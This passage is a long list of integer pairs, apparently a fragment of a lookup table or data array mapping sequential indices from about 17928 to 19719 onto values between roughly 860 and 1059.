(17928, 896),
(17929, 897),
(17930, 897),
(17931, 897),
(17932, 897),
(17933, 897),
(17934, 897),
(17935, 898),
(17936, 898),
(17937, 898),
(17938, 898),
(17939, 898),
(17940, 898),
(17941, 899),
(17942, 899),
(17943, 899),
(17944, 899),
(17945, 899),
(17946, 899),
(17947, 900),
(17948, 900),
(17949, 900),
(17950, 900),
(17951, 900),
(17952, 900),
(17953, 901),
(17954, 901),
(17955, 901),
(17956, 901),
(17957, 901),
(17958, 901),
(17959, 902),
(17960, 902),
(17961, 902),
(17962, 902),
(17963, 902),
(17964, 902),
(17965, 903),
(17966, 903),
(17967, 903),
(17968, 903),
(17969, 903),
(17970, 903),
(17971, 904),
(17972, 904),
(17973, 904),
(17974, 904),
(17975, 904),
(17976, 904),
(17977, 905),
(17978, 905),
(17979, 905),
(17980, 905),
(17981, 905),
(17982, 905),
(17983, 906),
(17984, 906),
(17985, 906),
(17986, 906),
(17987, 906),
(17988, 906),
(17989, 906),
(17990, 906),
(17991, 906),
(17992, 907),
(17993, 907),
(17994, 907),
(17995, 907),
(17996, 907),
(17997, 907),
(17998, 908),
(17999, 908),
(18000, 908),
(18001, 908),
(18002, 908),
(18003, 908),
(18004, 909),
(18005, 909),
(18006, 909),
(18007, 909),
(18008, 909),
(18009, 909),
(18010, 910),
(18011, 910),
(18012, 910),
(18013, 910),
(18014, 910),
(18015, 910),
(18016, 911),
(18017, 911),
(18018, 911),
(18019, 911),
(18020, 911),
(18021, 911),
(18022, 911),
(18023, 911),
(18024, 911),
(18025, 912),
(18026, 912),
(18027, 912),
(18028, 912),
(18029, 912),
(18030, 912),
(18031, 913),
(18032, 913),
(18033, 913),
(18034, 913),
(18035, 913),
(18036, 913),
(18037, 914),
(18038, 914),
(18039, 914),
(18040, 914),
(18041, 914),
(18042, 914),
(18043, 915),
(18044, 915),
(18045, 915),
(18046, 915),
(18047, 915),
(18048, 915),
(18049, 916),
(18050, 916),
(18051, 916),
(18052, 916),
(18053, 916),
(18054, 916),
(18055, 917),
(18056, 917),
(18057, 917),
(18058, 917),
(18059, 917),
(18060, 917),
(18061, 918),
(18062, 918),
(18063, 918),
(18064, 918),
(18065, 918),
(18066, 918),
(18067, 919),
(18068, 919),
(18069, 919),
(18070, 919),
(18071, 919),
(18072, 919),
(18073, 920),
(18074, 920),
(18075, 920),
(18076, 920),
(18077, 920),
(18078, 920),
(18079, 921),
(18080, 921),
(18081, 921),
(18082, 921),
(18083, 921),
(18084, 921),
(18085, 922),
(18086, 922),
(18087, 922),
(18088, 922),
(18089, 922),
(18090, 922),
(18091, 923),
(18092, 923),
(18093, 923),
(18094, 923),
(18095, 923),
(18096, 923),
(18097, 924),
(18098, 924),
(18099, 924),
(18100, 924),
(18101, 924),
(18102, 924),
(18103, 924),
(18104, 924),
(18105, 924),
(18106, 925),
(18107, 925),
(18108, 925),
(18109, 925),
(18110, 925),
(18111, 925),
(18112, 926),
(18113, 926),
(18114, 926),
(18115, 926),
(18116, 926),
(18117, 926),
(18118, 927),
(18119, 927),
(18120, 927),
(18121, 927),
(18122, 927),
(18123, 927),
(18124, 928),
(18125, 928),
(18126, 928),
(18127, 928),
(18128, 928),
(18129, 928),
(18130, 929),
(18131, 929),
(18132, 929),
(18133, 929),
(18134, 929),
(18135, 929),
(18136, 930),
(18137, 930),
(18138, 930),
(18139, 930),
(18140, 930),
(18141, 930),
(18142, 931),
(18143, 931),
(18144, 931),
(18145, 931),
(18146, 931),
(18147, 931),
(18148, 932),
(18149, 932),
(18150, 932),
(18151, 932),
(18152, 932),
(18153, 932),
(18154, 933),
(18155, 933),
(18156, 933),
(18157, 933),
(18158, 933),
(18159, 933),
(18160, 934),
(18161, 934),
(18162, 934),
(18163, 934),
(18164, 934),
(18165, 934),
(18166, 935),
(18167, 935),
(18168, 935),
(18169, 935),
(18170, 935),
(18171, 935),
(18172, 936),
(18173, 936),
(18174, 936),
(18175, 936),
(18176, 936),
(18177, 936),
(18178, 937),
(18179, 937),
(18180, 937),
(18181, 937),
(18182, 937),
(18183, 937),
(18184, 937),
(18185, 937),
(18186, 937),
(18187, 938),
(18188, 938),
(18189, 938),
(18190, 938),
(18191, 938),
(18192, 938),
(18193, 939),
(18194, 939),
(18195, 939),
(18196, 939),
(18197, 939),
(18198, 939),
(18199, 940),
(18200, 940),
(18201, 940),
(18202, 940),
(18203, 940),
(18204, 940),
(18205, 941),
(18206, 941),
(18207, 941),
(18208, 941),
(18209, 941),
(18210, 941),
(18211, 942),
(18212, 942),
(18213, 942),
(18214, 942),
(18215, 942),
(18216, 942),
(18217, 943),
(18218, 943),
(18219, 943),
(18220, 943),
(18221, 943),
(18222, 943),
(18223, 944),
(18224, 944),
(18225, 944),
(18226, 944),
(18227, 944),
(18228, 944),
(18229, 945),
(18230, 945),
(18231, 945),
(18232, 945),
(18233, 945),
(18234, 945),
(18235, 946),
(18236, 946),
(18237, 946),
(18238, 946),
(18239, 946),
(18240, 946),
(18241, 947),
(18242, 947),
(18243, 947),
(18244, 947),
(18245, 947),
(18246, 947),
(18247, 948),
(18248, 948),
(18249, 948),
(18250, 948),
(18251, 948),
(18252, 948),
(18253, 949),
(18254, 949),
(18255, 949),
(18256, 949),
(18257, 949),
(18258, 949),
(18259, 950),
(18260, 950),
(18261, 950),
(18262, 950),
(18263, 950),
(18264, 950),
(18265, 950),
(18266, 950),
(18267, 950),
(18268, 951),
(18269, 951),
(18270, 951),
(18271, 951),
(18272, 951),
(18273, 951),
(18274, 952),
(18275, 952),
(18276, 952),
(18277, 952),
(18278, 952),
(18279, 952),
(18280, 953),
(18281, 953),
(18282, 953),
(18283, 953),
(18284, 953),
(18285, 953),
(18286, 954),
(18287, 954),
(18288, 954),
(18289, 954),
(18290, 954),
(18291, 954),
(18292, 955),
(18293, 955),
(18294, 955),
(18295, 955),
(18296, 955),
(18297, 955),
(18298, 956),
(18299, 956),
(18300, 956),
(18301, 956),
(18302, 956),
(18303, 956),
(18304, 957),
(18305, 957),
(18306, 957),
(18307, 957),
(18308, 957),
(18309, 957),
(18310, 958),
(18311, 958),
(18312, 958),
(18313, 958),
(18314, 958),
(18315, 958),
(18316, 959),
(18317, 959),
(18318, 959),
(18319, 959),
(18320, 959),
(18321, 959),
(18322, 860),
(18323, 860),
(18324, 861),
(18325, 861),
(18326, 862),
(18327, 862),
(18328, 863),
(18329, 863),
(18330, 864),
(18331, 864),
(18332, 865),
(18333, 865),
(18334, 866),
(18335, 866),
(18336, 867),
(18337, 868),
(18338, 868),
(18339, 869),
(18340, 869),
(18341, 870),
(18342, 870),
(18343, 871),
(18344, 871),
(18345, 872),
(18346, 872),
(18347, 873),
(18348, 873),
(18349, 874),
(18350, 874),
(18351, 875),
(18352, 875),
(18353, 876),
(18354, 876),
(18355, 877),
(18356, 877),
(18357, 878),
(18358, 878),
(18359, 879),
(18360, 879),
(18361, 880),
(18362, 881),
(18363, 881),
(18364, 882),
(18365, 882),
(18366, 883),
(18367, 883),
(18368, 884),
(18369, 884),
(18370, 885),
(18371, 885),
(18372, 886),
(18373, 886),
(18374, 887),
(18375, 887),
(18376, 888),
(18377, 888),
(18378, 889),
(18379, 889),
(18380, 890),
(18381, 890),
(18382, 891),
(18383, 891),
(18384, 892),
(18385, 892),
(18386, 893),
(18387, 894),
(18388, 894),
(18389, 895),
(18390, 895),
(18391, 896),
(18392, 896),
(18393, 897),
(18394, 897),
(18395, 898),
(18396, 898),
(18397, 899),
(18398, 899),
(18399, 900),
(18400, 900),
(18401, 901),
(18402, 901),
(18403, 902),
(18404, 902),
(18405, 903),
(18406, 903),
(18407, 904),
(18408, 904),
(18409, 905),
(18410, 905),
(18411, 906),
(18412, 907),
(18413, 907),
(18414, 908),
(18415, 908),
(18416, 909),
(18417, 909),
(18418, 910),
(18419, 910),
(18420, 911),
(18421, 912),
(18422, 912),
(18423, 913),
(18424, 913),
(18425, 914),
(18426, 914),
(18427, 915),
(18428, 915),
(18429, 916),
(18430, 916),
(18431, 917),
(18432, 917),
(18433, 918),
(18434, 918),
(18435, 919),
(18436, 919),
(18437, 920),
(18438, 920),
(18439, 921),
(18440, 921),
(18441, 922),
(18442, 922),
(18443, 923),
(18444, 923),
(18445, 924),
(18446, 925),
(18447, 925),
(18448, 926),
(18449, 926),
(18450, 927),
(18451, 927),
(18452, 928),
(18453, 928),
(18454, 929),
(18455, 929),
(18456, 930),
(18457, 930),
(18458, 931),
(18459, 931),
(18460, 932),
(18461, 932),
(18462, 933),
(18463, 933),
(18464, 934),
(18465, 934),
(18466, 935),
(18467, 935),
(18468, 936),
(18469, 936),
(18470, 937),
(18471, 938),
(18472, 938),
(18473, 939),
(18474, 939),
(18475, 940),
(18476, 940),
(18477, 941),
(18478, 941),
(18479, 942),
(18480, 942),
(18481, 943),
(18482, 943),
(18483, 944),
(18484, 944),
(18485, 945),
(18486, 945),
(18487, 946),
(18488, 946),
(18489, 947),
(18490, 947),
(18491, 948),
(18492, 948),
(18493, 949),
(18494, 949),
(18495, 950),
(18496, 951),
(18497, 951),
(18498, 952),
(18499, 952),
(18500, 953),
(18501, 953),
(18502, 954),
(18503, 954),
(18504, 955),
(18505, 955),
(18506, 956),
(18507, 956),
(18508, 957),
(18509, 957),
(18510, 958),
(18511, 958),
(18512, 959),
(18513, 959),
(18514, 960),
(18515, 961),
(18516, 962),
(18517, 963),
(18518, 964),
(18519, 965),
(18520, 966),
(18521, 967),
(18522, 968),
(18523, 969),
(18524, 970),
(18525, 971),
(18526, 972),
(18527, 973),
(18528, 974),
(18529, 975),
(18530, 976),
(18531, 977),
(18532, 978),
(18533, 979),
(18534, 980),
(18535, 981),
(18536, 982),
(18537, 983),
(18538, 984),
(18539, 985),
(18540, 986),
(18541, 987),
(18542, 988),
(18543, 989),
(18544, 990),
(18545, 991),
(18546, 992),
(18547, 993),
(18548, 994),
(18549, 995),
(18550, 996),
(18551, 997),
(18552, 998),
(18553, 999),
(18554, 1000),
(18555, 1001),
(18556, 1002),
(18557, 1003),
(18558, 1004),
(18559, 1005),
(18560, 1006),
(18561, 1007),
(18562, 1008),
(18563, 1009),
(18564, 1010),
(18565, 1011),
(18566, 1012),
(18567, 1013),
(18568, 1014),
(18569, 1015),
(18570, 1016),
(18571, 1017),
(18572, 1018),
(18573, 1019),
(18574, 1020),
(18575, 1021),
(18576, 1022),
(18577, 1023),
(18578, 1024),
(18579, 1025),
(18580, 1026),
(18581, 1027),
(18582, 1028),
(18583, 1029),
(18584, 1030),
(18585, 1031),
(18586, 1032),
(18587, 1033),
(18588, 1034),
(18589, 1035),
(18590, 1036),
(18591, 1037),
(18592, 1038),
(18593, 1039),
(18594, 1040),
(18595, 1041),
(18596, 1042),
(18597, 1043),
(18598, 1044),
(18599, 1045),
(18600, 1046),
(18601, 1047),
(18602, 1048),
(18603, 1049),
(18604, 1050),
(18605, 1051),
(18606, 1052),
(18607, 1053),
(18608, 1054),
(18609, 1055),
(18610, 1056),
(18611, 1057),
(18612, 1058),
(18613, 1059),
(18614, 960),
(18615, 961),
(18616, 961),
(18617, 961),
(18618, 962),
(18619, 963),
(18620, 963),
(18621, 963),
(18622, 964),
(18623, 964),
(18624, 964),
(18625, 965),
(18626, 966),
(18627, 967),
(18628, 967),
(18629, 967),
(18630, 968),
(18631, 969),
(18632, 970),
(18633, 970),
(18634, 970),
(18635, 971),
(18636, 972),
(18637, 973),
(18638, 973),
(18639, 973),
(18640, 974),
(18641, 975),
(18642, 976),
(18643, 976),
(18644, 976),
(18645, 977),
(18646, 977),
(18647, 978),
(18648, 979),
(18649, 980),
(18650, 980),
(18651, 981),
(18652, 982),
(18653, 983),
(18654, 983),
(18655, 984),
(18656, 985),
(18657, 986),
(18658, 986),
(18659, 987),
(18660, 988),
(18661, 989),
(18662, 989),
(18663, 990),
(18664, 991),
(18665, 991),
(18666, 991),
(18667, 992),
(18668, 993),
(18669, 994),
(18670, 994),
(18671, 994),
(18672, 995),
(18673, 996),
(18674, 997),
(18675, 997),
(18676, 997),
(18677, 998),
(18678, 999),
(18679, 1000),
(18680, 1000),
(18681, 1000),
(18682, 1001),
(18683, 1002),
(18684, 1002),
(18685, 1002),
(18686, 1003),
(18687, 1003),
(18688, 1003),
(18689, 1004),
(18690, 1005),
(18691, 1006),
(18692, 1006),
(18693, 1006),
(18694, 1007),
(18695, 1008),
(18696, 1009),
(18697, 1009),
(18698, 1009),
(18699, 1010),
(18700, 1011),
(18701, 1012),
(18702, 1012),
(18703, 1012),
(18704, 1013),
(18705, 1014),
(18706, 1015),
(18707, 1015),
(18708, 1015),
(18709, 1016),
(18710, 1017),
(18711, 1017),
(18712, 1018),
(18713, 1019),
(18714, 1020),
(18715, 1020),
(18716, 1021),
(18717, 1022),
(18718, 1023),
(18719, 1023),
(18720, 1024),
(18721, 1025),
(18722, 1026),
(18723, 1026),
(18724, 1027),
(18725, 1028),
(18726, 1028),
(18727, 1029),
(18728, 1030),
(18729, 1031),
(18730, 1031),
(18731, 1032),
(18732, 1033),
(18733, 1034),
(18734, 1034),
(18735, 1035),
(18736, 1036),
(18737, 1037),
(18738, 1037),
(18739, 1038),
(18740, 1039),
(18741, 1040),
(18742, 1040),
(18743, 1041),
(18744, 1041),
(18745, 1042),
(18746, 1042),
(18747, 1042),
(18748, 1043),
(18749, 1044),
(18750, 1045),
(18751, 1045),
(18752, 1045),
(18753, 1046),
(18754, 1047),
(18755, 1048),
(18756, 1048),
(18757, 1048),
(18758, 1049),
(18759, 1050),
(18760, 1051),
(18761, 1051),
(18762, 1051),
(18763, 1052),
(18764, 1053),
(18765, 1054),
(18766, 1054),
(18767, 1054),
(18768, 1055),
(18769, 1056),
(18770, 1057),
(18771, 1057),
(18772, 1057),
(18773, 1058),
(18774, 1058),
(18775, 1058),
(18776, 1059),
(18777, 960),
(18778, 960),
(18779, 960),
(18780, 960),
(18781, 960),
(18782, 960),
(18783, 960),
(18784, 961),
(18785, 961),
(18786, 961),
(18787, 961),
(18788, 961),
(18789, 961),
(18790, 961),
(18791, 962),
(18792, 962),
(18793, 962),
(18794, 962),
(18795, 962),
(18796, 962),
(18797, 962),
(18798, 963),
(18799, 963),
(18800, 963),
(18801, 963),
(18802, 963),
(18803, 963),
(18804, 963),
(18805, 963),
(18806, 963),
(18807, 963),
(18808, 963),
(18809, 964),
(18810, 964),
(18811, 964),
(18812, 964),
(18813, 964),
(18814, 964),
(18815, 964),
(18816, 965),
(18817, 965),
(18818, 965),
(18819, 965),
(18820, 965),
(18821, 965),
(18822, 965),
(18823, 966),
(18824, 966),
(18825, 966),
(18826, 966),
(18827, 966),
(18828, 966),
(18829, 966),
(18830, 967),
(18831, 967),
(18832, 967),
(18833, 967),
(18834, 967),
(18835, 967),
(18836, 967),
(18837, 968),
(18838, 968),
(18839, 968),
(18840, 968),
(18841, 968),
(18842, 968),
(18843, 968),
(18844, 969),
(18845, 969),
(18846, 969),
(18847, 969),
(18848, 969),
(18849, 969),
(18850, 969),
(18851, 970),
(18852, 970),
(18853, 970),
(18854, 970),
(18855, 970),
(18856, 970),
(18857, 970),
(18858, 971),
(18859, 971),
(18860, 971),
(18861, 971),
(18862, 971),
(18863, 971),
(18864, 971),
(18865, 972),
(18866, 972),
(18867, 972),
(18868, 972),
(18869, 972),
(18870, 972),
(18871, 972),
(18872, 973),
(18873, 973),
(18874, 973),
(18875, 973),
(18876, 973),
(18877, 973),
(18878, 973),
(18879, 974),
(18880, 974),
(18881, 974),
(18882, 974),
(18883, 974),
(18884, 974),
(18885, 974),
(18886, 975),
(18887, 975),
(18888, 975),
(18889, 975),
(18890, 975),
(18891, 975),
(18892, 975),
(18893, 976),
(18894, 976),
(18895, 976),
(18896, 976),
(18897, 976),
(18898, 976),
(18899, 976),
(18900, 976),
(18901, 976),
(18902, 976),
(18903, 976),
(18904, 977),
(18905, 977),
(18906, 977),
(18907, 977),
(18908, 977),
(18909, 977),
(18910, 977),
(18911, 978),
(18912, 978),
(18913, 978),
(18914, 978),
(18915, 978),
(18916, 978),
(18917, 978),
(18918, 979),
(18919, 979),
(18920, 979),
(18921, 979),
(18922, 979),
(18923, 979),
(18924, 979),
(18925, 980),
(18926, 980),
(18927, 980),
(18928, 980),
(18929, 980),
(18930, 980),
(18931, 980),
(18932, 981),
(18933, 981),
(18934, 981),
(18935, 981),
(18936, 981),
(18937, 981),
(18938, 981),
(18939, 982),
(18940, 982),
(18941, 982),
(18942, 982),
(18943, 982),
(18944, 982),
(18945, 982),
(18946, 983),
(18947, 983),
(18948, 983),
(18949, 983),
(18950, 983),
(18951, 983),
(18952, 983),
(18953, 984),
(18954, 984),
(18955, 984),
(18956, 984),
(18957, 984),
(18958, 984),
(18959, 984),
(18960, 985),
(18961, 985),
(18962, 985),
(18963, 985),
(18964, 985),
(18965, 985),
(18966, 985),
(18967, 986),
(18968, 986),
(18969, 986),
(18970, 986),
(18971, 986),
(18972, 986),
(18973, 986),
(18974, 987),
(18975, 987),
(18976, 987),
(18977, 987),
(18978, 987),
(18979, 987),
(18980, 987),
(18981, 988),
(18982, 988),
(18983, 988),
(18984, 988),
(18985, 988),
(18986, 988),
(18987, 988),
(18988, 989),
(18989, 989),
(18990, 989),
(18991, 989),
(18992, 989),
(18993, 989),
(18994, 989),
(18995, 989),
(18996, 989),
(18997, 989),
(18998, 989),
(18999, 990),
(19000, 990),
(19001, 990),
(19002, 990),
(19003, 990),
(19004, 990),
(19005, 990),
(19006, 991),
(19007, 991),
(19008, 991),
(19009, 991),
(19010, 991),
(19011, 991),
(19012, 991),
(19013, 992),
(19014, 992),
(19015, 992),
(19016, 992),
(19017, 992),
(19018, 992),
(19019, 992),
(19020, 993),
(19021, 993),
(19022, 993),
(19023, 993),
(19024, 993),
(19025, 993),
(19026, 993),
(19027, 994),
(19028, 994),
(19029, 994),
(19030, 994),
(19031, 994),
(19032, 994),
(19033, 994),
(19034, 995),
(19035, 995),
(19036, 995),
(19037, 995),
(19038, 995),
(19039, 995),
(19040, 995),
(19041, 996),
(19042, 996),
(19043, 996),
(19044, 996),
(19045, 996),
(19046, 996),
(19047, 996),
(19048, 997),
(19049, 997),
(19050, 997),
(19051, 997),
(19052, 997),
(19053, 997),
(19054, 997),
(19055, 998),
(19056, 998),
(19057, 998),
(19058, 998),
(19059, 998),
(19060, 998),
(19061, 998),
(19062, 999),
(19063, 999),
(19064, 999),
(19065, 999),
(19066, 999),
(19067, 999),
(19068, 999),
(19069, 1000),
(19070, 1000),
(19071, 1000),
(19072, 1000),
(19073, 1000),
(19074, 1000),
(19075, 1000),
(19076, 1001),
(19077, 1001),
(19078, 1001),
(19079, 1001),
(19080, 1001),
(19081, 1001),
(19082, 1001),
(19083, 1002),
(19084, 1002),
(19085, 1002),
(19086, 1002),
(19087, 1002),
(19088, 1002),
(19089, 1002),
(19090, 1002),
(19091, 1002),
(19092, 1002),
(19093, 1002),
(19094, 1003),
(19095, 1003),
(19096, 1003),
(19097, 1003),
(19098, 1003),
(19099, 1003),
(19100, 1003),
(19101, 1004),
(19102, 1004),
(19103, 1004),
(19104, 1004),
(19105, 1004),
(19106, 1004),
(19107, 1004),
(19108, 1005),
(19109, 1005),
(19110, 1005),
(19111, 1005),
(19112, 1005),
(19113, 1005),
(19114, 1005),
(19115, 1006),
(19116, 1006),
(19117, 1006),
(19118, 1006),
(19119, 1006),
(19120, 1006),
(19121, 1006),
(19122, 1007),
(19123, 1007),
(19124, 1007),
(19125, 1007),
(19126, 1007),
(19127, 1007),
(19128, 1007),
(19129, 1008),
(19130, 1008),
(19131, 1008),
(19132, 1008),
(19133, 1008),
(19134, 1008),
(19135, 1008),
(19136, 1009),
(19137, 1009),
(19138, 1009),
(19139, 1009),
(19140, 1009),
(19141, 1009),
(19142, 1009),
(19143, 1010),
(19144, 1010),
(19145, 1010),
(19146, 1010),
(19147, 1010),
(19148, 1010),
(19149, 1010),
(19150, 1011),
(19151, 1011),
(19152, 1011),
(19153, 1011),
(19154, 1011),
(19155, 1011),
(19156, 1011),
(19157, 1012),
(19158, 1012),
(19159, 1012),
(19160, 1012),
(19161, 1012),
(19162, 1012),
(19163, 1012),
(19164, 1013),
(19165, 1013),
(19166, 1013),
(19167, 1013),
(19168, 1013),
(19169, 1013),
(19170, 1013),
(19171, 1014),
(19172, 1014),
(19173, 1014),
(19174, 1014),
(19175, 1014),
(19176, 1014),
(19177, 1014),
(19178, 1015),
(19179, 1015),
(19180, 1015),
(19181, 1015),
(19182, 1015),
(19183, 1015),
(19184, 1015),
(19185, 1015),
(19186, 1015),
(19187, 1015),
(19188, 1015),
(19189, 1016),
(19190, 1016),
(19191, 1016),
(19192, 1016),
(19193, 1016),
(19194, 1016),
(19195, 1016),
(19196, 1017),
(19197, 1017),
(19198, 1017),
(19199, 1017),
(19200, 1017),
(19201, 1017),
(19202, 1017),
(19203, 1018),
(19204, 1018),
(19205, 1018),
(19206, 1018),
(19207, 1018),
(19208, 1018),
(19209, 1018),
(19210, 1019),
(19211, 1019),
(19212, 1019),
(19213, 1019),
(19214, 1019),
(19215, 1019),
(19216, 1019),
(19217, 1020),
(19218, 1020),
(19219, 1020),
(19220, 1020),
(19221, 1020),
(19222, 1020),
(19223, 1020),
(19224, 1021),
(19225, 1021),
(19226, 1021),
(19227, 1021),
(19228, 1021),
(19229, 1021),
(19230, 1021),
(19231, 1022),
(19232, 1022),
(19233, 1022),
(19234, 1022),
(19235, 1022),
(19236, 1022),
(19237, 1022),
(19238, 1023),
(19239, 1023),
(19240, 1023),
(19241, 1023),
(19242, 1023),
(19243, 1023),
(19244, 1023),
(19245, 1024),
(19246, 1024),
(19247, 1024),
(19248, 1024),
(19249, 1024),
(19250, 1024),
(19251, 1024),
(19252, 1025),
(19253, 1025),
(19254, 1025),
(19255, 1025),
(19256, 1025),
(19257, 1025),
(19258, 1025),
(19259, 1026),
(19260, 1026),
(19261, 1026),
(19262, 1026),
(19263, 1026),
(19264, 1026),
(19265, 1026),
(19266, 1027),
(19267, 1027),
(19268, 1027),
(19269, 1027),
(19270, 1027),
(19271, 1027),
(19272, 1027),
(19273, 1028),
(19274, 1028),
(19275, 1028),
(19276, 1028),
(19277, 1028),
(19278, 1028),
(19279, 1028),
(19280, 1028),
(19281, 1028),
(19282, 1028),
(19283, 1028),
(19284, 1029),
(19285, 1029),
(19286, 1029),
(19287, 1029),
(19288, 1029),
(19289, 1029),
(19290, 1029),
(19291, 1030),
(19292, 1030),
(19293, 1030),
(19294, 1030),
(19295, 1030),
(19296, 1030),
(19297, 1030),
(19298, 1031),
(19299, 1031),
(19300, 1031),
(19301, 1031),
(19302, 1031),
(19303, 1031),
(19304, 1031),
(19305, 1032),
(19306, 1032),
(19307, 1032),
(19308, 1032),
(19309, 1032),
(19310, 1032),
(19311, 1032),
(19312, 1033),
(19313, 1033),
(19314, 1033),
(19315, 1033),
(19316, 1033),
(19317, 1033),
(19318, 1033),
(19319, 1034),
(19320, 1034),
(19321, 1034),
(19322, 1034),
(19323, 1034),
(19324, 1034),
(19325, 1034),
(19326, 1035),
(19327, 1035),
(19328, 1035),
(19329, 1035),
(19330, 1035),
(19331, 1035),
(19332, 1035),
(19333, 1036),
(19334, 1036),
(19335, 1036),
(19336, 1036),
(19337, 1036),
(19338, 1036),
(19339, 1036),
(19340, 1037),
(19341, 1037),
(19342, 1037),
(19343, 1037),
(19344, 1037),
(19345, 1037),
(19346, 1037),
(19347, 1038),
(19348, 1038),
(19349, 1038),
(19350, 1038),
(19351, 1038),
(19352, 1038),
(19353, 1038),
(19354, 1039),
(19355, 1039),
(19356, 1039),
(19357, 1039),
(19358, 1039),
(19359, 1039),
(19360, 1039),
(19361, 1040),
(19362, 1040),
(19363, 1040),
(19364, 1040),
(19365, 1040),
(19366, 1040),
(19367, 1040),
(19368, 1041),
(19369, 1041),
(19370, 1041),
(19371, 1041),
(19372, 1041),
(19373, 1041),
(19374, 1041),
(19375, 1041),
(19376, 1041),
(19377, 1041),
(19378, 1041),
(19379, 1042),
(19380, 1042),
(19381, 1042),
(19382, 1042),
(19383, 1042),
(19384, 1042),
(19385, 1042),
(19386, 1043),
(19387, 1043),
(19388, 1043),
(19389, 1043),
(19390, 1043),
(19391, 1043),
(19392, 1043),
(19393, 1044),
(19394, 1044),
(19395, 1044),
(19396, 1044),
(19397, 1044),
(19398, 1044),
(19399, 1044),
(19400, 1045),
(19401, 1045),
(19402, 1045),
(19403, 1045),
(19404, 1045),
(19405, 1045),
(19406, 1045),
(19407, 1046),
(19408, 1046),
(19409, 1046),
(19410, 1046),
(19411, 1046),
(19412, 1046),
(19413, 1046),
(19414, 1047),
(19415, 1047),
(19416, 1047),
(19417, 1047),
(19418, 1047),
(19419, 1047),
(19420, 1047),
(19421, 1048),
(19422, 1048),
(19423, 1048),
(19424, 1048),
(19425, 1048),
(19426, 1048),
(19427, 1048),
(19428, 1049),
(19429, 1049),
(19430, 1049),
(19431, 1049),
(19432, 1049),
(19433, 1049),
(19434, 1049),
(19435, 1050),
(19436, 1050),
(19437, 1050),
(19438, 1050),
(19439, 1050),
(19440, 1050),
(19441, 1050),
(19442, 1051),
(19443, 1051),
(19444, 1051),
(19445, 1051),
(19446, 1051),
(19447, 1051),
(19448, 1051),
(19449, 1052),
(19450, 1052),
(19451, 1052),
(19452, 1052),
(19453, 1052),
(19454, 1052),
(19455, 1052),
(19456, 1053),
(19457, 1053),
(19458, 1053),
(19459, 1053),
(19460, 1053),
(19461, 1053),
(19462, 1053),
(19463, 1054),
(19464, 1054),
(19465, 1054),
(19466, 1054),
(19467, 1054),
(19468, 1054),
(19469, 1054),
(19470, 1055),
(19471, 1055),
(19472, 1055),
(19473, 1055),
(19474, 1055),
(19475, 1055),
(19476, 1055),
(19477, 1056),
(19478, 1056),
(19479, 1056),
(19480, 1056),
(19481, 1056),
(19482, 1056),
(19483, 1056),
(19484, 1057),
(19485, 1057),
(19486, 1057),
(19487, 1057),
(19488, 1057),
(19489, 1057),
(19490, 1057),
(19491, 1057),
(19492, 1057),
(19493, 1057),
(19494, 1057),
(19495, 1058),
(19496, 1058),
(19497, 1058),
(19498, 1058),
(19499, 1058),
(19500, 1058),
(19501, 1058),
(19502, 1059),
(19503, 1059),
(19504, 1059),
(19505, 1059),
(19506, 1059),
(19507, 1059),
(19508, 1059),
(19509, 960),
(19510, 961),
(19511, 962),
(19512, 963),
(19513, 964),
(19514, 965),
(19515, 966),
(19516, 967),
(19517, 968),
(19518, 969),
(19519, 970),
(19520, 971),
(19521, 972),
(19522, 973),
(19523, 974),
(19524, 975),
(19525, 976),
(19526, 977),
(19527, 978),
(19528, 979),
(19529, 980),
(19530, 981),
(19531, 982),
(19532, 983),
(19533, 984),
(19534, 985),
(19535, 986),
(19536, 987),
(19537, 988),
(19538, 989),
(19539, 990),
(19540, 991),
(19541, 992),
(19542, 993),
(19543, 994),
(19544, 995),
(19545, 996),
(19546, 997),
(19547, 998),
(19548, 999),
(19549, 1000),
(19550, 1001),
(19551, 1002),
(19552, 1003),
(19553, 1004),
(19554, 1005),
(19555, 1006),
(19556, 1007),
(19557, 1008),
(19558, 1009),
(19559, 1010),
(19560, 1011),
(19561, 1012),
(19562, 1013),
(19563, 1014),
(19564, 1015),
(19565, 1016),
(19566, 1017),
(19567, 1018),
(19568, 1019),
(19569, 1020),
(19570, 1021),
(19571, 1022),
(19572, 1023),
(19573, 1024),
(19574, 1025),
(19575, 1026),
(19576, 1027),
(19577, 1028),
(19578, 1029),
(19579, 1030),
(19580, 1031),
(19581, 1032),
(19582, 1033),
(19583, 1034),
(19584, 1035),
(19585, 1036),
(19586, 1037),
(19587, 1038),
(19588, 1039),
(19589, 1040),
(19590, 1041),
(19591, 1042),
(19592, 1043),
(19593, 1044),
(19594, 1045),
(19595, 1046),
(19596, 1047),
(19597, 1048),
(19598, 1049),
(19599, 1050),
(19600, 1051),
(19601, 1052),
(19602, 1053),
(19603, 1054),
(19604, 1055),
(19605, 1056),
(19606, 1057),
(19607, 1058),
(19608, 1059),
(19609, 960),
(19610, 960),
(19611, 960),
(19612, 960),
(19613, 960),
(19614, 960),
(19615, 961),
(19616, 961),
(19617, 961),
(19618, 961),
(19619, 961),
(19620, 961),
(19621, 962),
(19622, 962),
(19623, 962),
(19624, 962),
(19625, 962),
(19626, 962),
(19627, 963),
(19628, 963),
(19629, 963),
(19630, 963),
(19631, 963),
(19632, 963),
(19633, 963),
(19634, 963),
(19635, 963),
(19636, 964),
(19637, 964),
(19638, 964),
(19639, 964),
(19640, 964),
(19641, 964),
(19642, 965),
(19643, 965),
(19644, 965),
(19645, 965),
(19646, 965),
(19647, 965),
(19648, 966),
(19649, 966),
(19650, 966),
(19651, 966),
(19652, 966),
(19653, 966),
(19654, 967),
(19655, 967),
(19656, 967),
(19657, 967),
(19658, 967),
(19659, 967),
(19660, 968),
(19661, 968),
(19662, 968),
(19663, 968),
(19664, 968),
(19665, 968),
(19666, 969),
(19667, 969),
(19668, 969),
(19669, 969),
(19670, 969),
(19671, 969),
(19672, 970),
(19673, 970),
(19674, 970),
(19675, 970),
(19676, 970),
(19677, 970),
(19678, 971),
(19679, 971),
(19680, 971),
(19681, 971),
(19682, 971),
(19683, 971),
(19684, 972),
(19685, 972),
(19686, 972),
(19687, 972),
(19688, 972),
(19689, 972),
(19690, 973),
(19691, 973),
(19692, 973),
(19693, 973),
(19694, 973),
(19695, 973),
(19696, 974),
(19697, 974),
(19698, 974),
(19699, 974),
(19700, 974),
(19701, 974),
(19702, 975),
(19703, 975),
(19704, 975),
(19705, 975),
(19706, 975),
(19707, 975),
(19708, 976),
(19709, 976),
(19710, 976),
(19711, 976),
(19712, 976),
(19713, 976),
(19714, 976),
(19715, 976),
(19716, 976),
(19717, 977),
(19718, 977),
(19719, 977),
